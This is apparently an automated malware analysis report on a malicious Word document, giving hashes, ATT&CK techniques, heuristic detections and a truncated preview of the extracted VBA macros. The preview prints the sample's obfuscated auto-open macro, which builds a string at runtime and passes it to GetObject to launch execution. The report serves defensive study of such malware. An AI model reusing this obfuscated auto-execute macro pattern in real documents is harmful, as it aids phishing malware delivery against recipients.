Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 034a1da7a0175ee1…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 114.4 KB
Created: 2019-04-09 06:39:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: e357e1e545f58eb75c7e6b8ad644de37
SHA-1: acd5ae0eb20372414a1e45e0f2740750677e1014
SHA-256: 034a1da7a0175ee1483ad02ebef70025bb6ef83ac703f510ed59a1069f25b89e
Risk score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The file is identified as malicious by ClamAV and contains VBA macros, specifically an autoopen macro that executes a GetObject call. This indicates the document is designed to run malicious code upon opening, likely to download and execute a second-stage payload. The presence of obfuscated VBA code and the autoopen macro strongly suggest a macro-based malware delivery.

Heuristics (7)

  • ClamAV: Doc.Malware.00536d-6935147-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.00536d-6935147-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    The document contains VBA macro code.
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    The VBA project contains an AutoOpen macro, which Word runs automatically when the document is opened.
  • GetObject call [high] (OLE_VBA_GETOBJ)
    The macro code contains a GetObject call, which can instantiate COM objects from a string built at runtime.
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body). This is the standard OOXML DrawingML namespace identifier found in the document body, not a URL reached by the macro code.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 20242 bytes
SHA-256: 012e60b2d38a9da645748dc911851532d1f5353a540857d78f5aae6a85a26f05

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "VUDU4Ck"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "JQQ__cXC"
Attribute VB_Base = "0{A32E9AA0-A660-4C4E-88C7-6F7AF43DF76B}{324022BB-4127-4E0A-B8F1-7B2D87FACF31}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "MUUBAA"
Attribute VB_Base = "0{D68E7160-302E-405F-B97A-FA06847CDF50}{353E8415-77CE-442B-923B-7B4110734E4C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "zAABXxA"
Function wAAc4UB1()
      If mAooxB > s4ZZUXQA Then
      BUAccA = 731226401 - iDUQDBG
      If kAkABUo < MkUBUAA Then
         Day Atn(mAAAAD)
      End If
   End If
   Set XBUAADA = wQBAkQ
      If oQoAAD > m_ccw4 Then
      j_CcA4A = 771481287 - F_GAQXQU
      If r_ZGBo < BBo1c1x_ Then
         Day Atn(KADDAA14)
      End If
   End If
   Set pwBDBQwc = T4DADD
      If bAAQAA > HAXAAD Then
      NAAxcX = 754631206 - EA4AAA
      If n4AAGQ < sAAQXA Then
         Day Atn(NAwQXA1C)
      End If
   End If
   Set VxxZ4Z = oAABDA
End Function
Sub autoopen()
YwZwAA
End Sub
Function u11BU1Z()
      If UZZAAC > ZAXAoZo_ Then
      LQcBo_ = 905491430 - jCAU4B
      If LDGoUc < wAAAQADB Then
         Day Atn(JBAAQQB)
      End If
   End If
   Set LB4AxA = VAZBDBC
      If PUDwkA > nDDXAA Then
      FAAAXA = 590727669 - uUZ1AACA
      If CXB1X4B < XAAZBX4 Then
         Day Atn(wokXAwx)
      End If
   End If
   Set RAADAAcA = EU4ADUQA
      If PCAxA4 > iUUCGUAX Then
      CAcQAQ = 654363851 - p1UDCAx
      If tkXUAAAA < WDCoABD Then
         Day Atn(GCD_cCGo)
      End If
   End If
   Set bABAADc = zDBkxD
End Function

Attribute VB_Name = "cA4AUDU"
Function ixkkBDo()
      If kQwkAk > VA4kAGD Then
      qQAAAQD = 150794104 - YD_AkxBA
      If cco4AD < nXoGUB Then
         Day Atn(uQcAC1UC)
      End If
   End If
   Set IZkcQBAo = LUBkoUkB
      If sQAAQxZ > ikUDoww Then
      TAoACw1 = 99533539 - EUBAAx
      If kUQ1GQ < iXDBGAU Then
         Day Atn(lCAXDUA)
      End If
   End If
   Set Gx14DCcZ = DcAB1ADx
End Function
Function YwZwAA()
On Error Resume Next
      If bXZoAoCA > mUQ1cA Then
      FQUBokQA = 860465702 - hcAcAAAA
      If kAoAoA < TDABAQA Then
         Day Atn(TkQxAc)
      End If
   End If
   Set zUQZAA = VAZAcABA
      If SGXGA_ > NkADAZA Then
      LQDwA4 = 123997924 - KBAAA4X
      If MQAAQwBA < L4AQUAUA Then
         Day Atn(EDZAAoA)
      End If
   End If
   Set rAAQGA = BkU_cACA
      If zADwDAAB > ZwUGkkA Then
      MBwCAk4 = 541157500 - wXUA1QBB
      If YAcGw1AQ < nAQAxUAX Then
         Day Atn(aAAADAAA)
      End If
   End If
   Set dBXoAB = nBAACAkG
oAAcDA = MUUBAA.cCCAAQ + MUUBAA.H_AABACA + MUUBAA.cCCAAQ + MUUBAA.AQAAoA_ + MUUBAA.cCCAAQ
      If HUXDkAk1 > BAkxoDX Then
      TQA1B_w = 645429478 - UCAZx_BC
      If ODDGGDAZ < pkAAGAZA Then
         Day Atn(UBBQA1Ak)
      End If
   End If
   Set GDwkxX = ZAAAAAA
      If G4A1AUA > GDA1AC Then
      JAUoXU = 454486954 - PAQ_UA1
      If qkAGoZA < lADGU1 Then
         Day Atn(zZCocAUU)
      End If
   End If
   Set hAAAo_ = VQBo_B
Set Zx1oAZ_ = GetObject(MUUBAA.cCCAAQ + MUUBAA.H_AABACA + MUUBAA.cCCAAQ + MUUBAA.AQAAoA_ + MUUBAA.cCCAAQ + MUUBAA.fQAoXCG + MUUBAA.cCCAAQ)
      If CkAADA > MoD_oo Then
      nDAkXwAX = 67638643 - PAGAC4X
      If SACkUABD < HGDDAwXA Then
         Day Atn(LccxAXBA)
      End If
   End If
   Set jcwDkAQU = IQAccwQ
      If RZ_oA_c > DBA14A Then
      lADAAwBQ = 459710187 - YAAGDA
      If uAUQ_XB < LCGZUBA Then
         Day Atn(d1AACAU)
     
... (truncated)